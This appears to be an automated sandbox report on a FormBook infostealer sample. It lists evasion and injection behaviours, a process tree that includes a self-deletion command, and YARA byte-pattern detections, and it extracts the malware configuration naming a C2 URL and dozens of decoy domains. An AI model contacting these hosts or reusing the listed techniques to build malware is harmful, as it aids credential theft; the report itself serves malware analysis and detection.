Edit tour

Windows Analysis Report
primosdv3.1.1.0.exe

Overview

General Information

Sample Name:	primosdv3.1.1.0.exe
Analysis ID:	715075
MD5:	633bb3ab12d6fd7b6956aa3a93f55e9c
SHA1:	f4a72da6391fcc9c623ae26de27fc80f10cf9f2b
SHA256:	0b504e6f2a283de75673bbe913c5032b02cc6a92888f4dfab895f79104b11103
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Machine Learning detection for sample

Modifies the prolog of user mode functions (user mode inline hooks)

Found hidden mapped module (file has been removed from disk)

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found inlined nop instructions (likely shell or obfuscated code)

PE file does not import any functions

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

File is packed with WinRar

Checks if the current process is being debugged

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

primosdv3.1.1.0.exe (PID: 5604 cmdline: C:\Users\user\Desktop\primosdv3.1.1.0.exe MD5: 633BB3AB12D6FD7B6956AA3A93F55E9C)

bstkiooen.exe (PID: 6112 cmdline: "C:\Users\user\AppData\Local\Temp\bstkiooen.exe" MD5: A2AF309781DF2F75DC0B57AE63B0F3A9)

bstkiooen.exe (PID: 3092 cmdline: "C:\Users\user\AppData\Local\Temp\bstkiooen.exe" MD5: A2AF309781DF2F75DC0B57AE63B0F3A9)

explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

svchost.exe (PID: 4024 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

cmd.exe (PID: 1244 cmdline: /c del "C:\Users\user\AppData\Local\Temp\bstkiooen.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.nordenergogrup.store/sk29/"], "decoy": ["invycons.com", "txirla.com", "skygrade.site", "mydubai.website", "giftr.online", "fotothink.com", "receitaspanelacaseira.online", "theroost.dev", "hy-allure.com", "homefilmcompany.online", "qest-mall.net", "palochkiotrollov.online", "aibset-terms.com", "clecrffp.work", "entel04.online", "conveyancercentralcoast.com", "evaij.info", "meitue.shop", "rothchild.top", "detecter-un-logiciel-espion.com", "pondokvaksin.net", "ethelh.club", "ky5653.com", "harriscountywageclaim.com", "ky9239.com", "medicierge.com", "hhro.us", "uuapple.tokyo", "lakeshoreguesthouse.com", "meiguoguo.top", "bennyrivera.photography", "mysittarausa.com", "suytrin.online", "sandstormcase.us", "amzn-2135.click", "galaxycrime.shop", "cabinetis.com", "rapidsketch.live", "nickhouston.com", "kinksandlocs.africa", "perinatolog.xyz", "soluofcr.com", "ethpow.domains", "cardinalchats.cloud", "macaront.info", "createorcollect.com", "csjkmcwl.work", "foxrightnow.site", "teazyy.com", "assafoetida-rife.biz", "surprisee.fun", "merkur-privatbanks-de.net", "wikipediathrive.com", "vijaysriniketan.tech", "nxaey.com", "shiershi.shop", "rthesieure.com", "deloxexchange.ltd", "dropmarketsystem.com", "49715.biz", "veganmetavers.xyz", "hty268.vip", "bfuiaccw.online", "beachsyndicate.info"]}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\F61A.tmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
C:\Users\user\AppData\Local\Temp\F61A.tmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
C:\Users\user\AppData\Local\Temp\F61A.tmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
C:\Users\user\AppData\Local\Temp\F61A.tmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x99cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x148b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x959a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17849:$sqlite3step: 68 34 1C 7B E1 0x1795c:$sqlite3step: 68 34 1C 7B E1 0x17878:$sqlite3text: 68 38 2A 90 C5 0x1799d:$sqlite3text: 68 38 2A 90 C5 0x1788b:$sqlite3blob: 68 53 D8 7F 8C 0x179b3:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x99cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x148b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x959a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17849:$sqlite3step: 68 34 1C 7B E1 0x1795c:$sqlite3step: 68 34 1C 7B E1 0x17878:$sqlite3text: 68 38 2A 90 C5 0x1799d:$sqlite3text: 68 38 2A 90 C5 0x1788b:$sqlite3blob: 68 53 D8 7F 8C 0x179b3:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x8bc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x18b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x11a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x192f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x41c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x7927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x892a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x4849:$sqlite3step: 68 34 1C 7B E1 0x495c:$sqlite3step: 68 34 1C 7B E1 0x4878:$sqlite3text: 68 38 2A 90 C5 0x499d:$sqlite3text: 68 38 2A 90 C5 0x488b:$sqlite3blob: 68 53 D8 7F 8C 0x49b3:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x99cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x148b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x959a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17849:$sqlite3step: 68 34 1C 7B E1 0x1795c:$sqlite3step: 68 34 1C 7B E1 0x17878:$sqlite3text: 68 38 2A 90 C5 0x1799d:$sqlite3text: 68 38 2A 90 C5 0x1788b:$sqlite3blob: 68 53 D8 7F 8C 0x179b3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: bstkiooen.exe PID: 3092	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5cba:$a1: 3C 30 50 4F 53 54 74 09 40 0x9368c:$a1: 3C 30 50 4F 53 54 74 09 40 0xf39a8:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: svchost.exe PID: 4024	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x9845f:$a1: 3C 30 50 4F 53 54 74 09 40 0xf7b60:$a1: 3C 30 50 4F 53 54 74 09 40 0xff3c9:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 37 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.bstkiooen.exe.400000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.bstkiooen.exe.400000.1.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
